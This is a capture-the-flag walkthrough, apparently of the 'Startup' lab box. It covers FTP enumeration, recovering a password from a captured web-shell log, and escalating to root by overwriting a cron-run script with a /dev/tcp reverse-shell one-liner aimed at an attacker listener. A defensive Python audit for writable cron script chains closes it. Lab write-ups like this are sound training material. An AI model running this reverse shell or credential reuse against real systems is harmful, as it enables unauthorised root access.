# Startup

## Nmap

```
sudo nmap 10.10.85.9 -p- -sS -sV     

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Anonymous login is allowed on FTP, and the share holds two files: a jpg and a txt document. I downloaded both. I also checked whether the FTP directory allows uploads and was able to upload a test document.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f0e405e4e4f917465c561a61deeaa4467f855bbf%2Fimage.png?alt=media)

**Contents of notice.txt:**

```
Whoever is leaving these damn Among Us memes in this share.
It IS NOT FUNNY. People downloading documents from our website 
will think we are a joke! Now I dont know who it is, but Maya is 
looking pretty sus.
```

**Important.jpg:**

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a2261b195d24197775c051f2a92179fcee149706%2Fimage.png?alt=media)

```
python3 dirsearch.py -u http://10.10.85.9 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dca9c199492876a80d85a2662890f499dee51170%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d42dcc873290ee1129f4631676ad8c1c9ff80f97%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dff1d7947ed4fc4eeb48e4c660d3b3af1ec4dff0%2Fimage.png?alt=media)

Looking through the directories in '/' we find the incidents folder, which contains a pcapng file of interest. We can host a Python SimpleHTTPServer on the target machine in this directory to transfer it.

```
python -m SimpleHTTPServer 8080
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-04c4edc22d36940914dbccb91488a43fe9805b14%2Fimage.png?alt=media)

Then use `wget` on our attacking machine to download the pcapng file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-79793e01cf967d50dcf99996bbeb5f7e593e24c5%2Fimage.png?alt=media)

Going through Wireshark manually for each packet we find an interesting string on packet #178.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bd8f684c05b08901b93203585eb1e984deb0f7b1%2Fimage.png?alt=media)

Right-clicking the packet and following the TCP stream reveals more information: a command history log from a web shell, likely left over from a previous compromise.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fc9a8a89df3b6a0f803333b54790d8b20d93f44f%2Fimage.png?alt=media)

We can take the password value from this log and SSH in as the other user on the box, Lennie.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0f9b7a5618f085a50210b6444dc50b17e769a2e8%2Fimage.png?alt=media)

In Lennie's home directory we can see a scripts folder. planner.sh is of interest, but it looks like we are unable to modify the file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-73146123c20d9030e670403d7ceeb5df18a02b35%2Fimage.png?alt=media)

However, the file print.sh, which planner.sh executes, is owned by us.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-75932c48d2456175cf16a52d0c736837dfaad06f%2Fimage.png?alt=media)

First we need to check whether the scripts are executed as part of a timed process. I downloaded pspy64 onto the attacking machine and executed it.

After a short while we see the following being executed at regular intervals:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-78ecb9d5373dd0b171a6a950d94c695daf1b6b45%2Fimage.png?alt=media)

As such, we can replace the contents of /etc/print.sh with a reverse shell and wait for a root shell to spawn.

```
# blank the script, then write the reverse shell one-liner (10.14.3.108:443 is our listener)
echo  > /etc/print.sh
echo '0<&196;exec 196<>/dev/tcp/10.14.3.108/443; sh <&196 >&196 2>&196' > /etc/print.sh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6c8534c84fc9c22e514625c09ded12333f58ccc2%2Fimage.png?alt=media)

Soon after, we receive a shell as root.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6a5b0579a5af492a0af104b3085d837a5418935d%2Fimage.png?alt=media)
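The root cause here is a root cron job whose script chain (planner.sh calling /etc/print.sh) includes a file a low-privileged user can rewrite. The following is an added audit example, not code from the original writeup or the room: it walks that chain from the cron entry and flags every script a non-trusted user could modify. The directory layout, file contents and uids are constructed assumptions built in a temp dir so it runs offline.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Added audit example (not from the original writeup): follow the chain of scripts
# a root cron entry launches and flag any link a non-trusted user could rewrite,
# the planner.sh -> /etc/print.sh weakness used above. Paths are assumptions.
SCRIPT_REF = re.compile(r"/[\w./-]+\.sh\b")  # absolute *.sh paths named in a script

def referenced_scripts(script: Path) -> list[Path]:
    """Heuristic: every absolute .sh path a script mentions is a child to audit."""
    return [Path(p) for p in SCRIPT_REF.findall(script.read_text(errors="replace"))]

def audit_cron_chain(entry: Path, trusted_uid: int = 0) -> list[tuple[str, str]]:
    """(path, reason) for each script in the chain a non-trusted user can modify:
    wrong owner, or group/world write bit set."""
    findings, seen, todo = [], set(), [entry]
    while todo:
        script = todo.pop()
        if script in seen or not script.is_file():
            continue
        seen.add(script)
        st = script.stat()
        if st.st_uid != trusted_uid:
            findings.append((str(script), f"owned by uid {st.st_uid}, not {trusted_uid}"))
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((str(script), "group- or world-writable"))
        todo.extend(referenced_scripts(script))  # recurse into called scripts
    return findings

def build_fixture(root: Path) -> Path:
    """Constructed layout mirroring the box: a locked-down planner.sh that calls
    an /etc/print.sh anyone can edit."""
    (root / "home/lennie/scripts").mkdir(parents=True)
    (root / "etc").mkdir()
    printer = root / "etc/print.sh"
    printer.write_text("#!/bin/bash\necho 'Done!'\n")
    planner = root / "home/lennie/scripts/planner.sh"
    planner.write_text(f"#!/bin/bash\n{printer}\n")
    planner.chmod(0o700)  # only its owner may change it
    printer.chmod(0o666)  # stand-in for a file the low-privileged user owns
    return planner

def run_demo() -> list[tuple[str, str]]:
    """Audit the fixture, treating the current user as the trusted cron owner."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_cron_chain(build_fixture(Path(tmp)), trusted_uid=os.getuid())
```

On a real host you would call `audit_cron_chain` on each script named in root's crontab and /etc/cron.d with the default `trusted_uid=0`; planner.sh passes and print.sh is reported.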
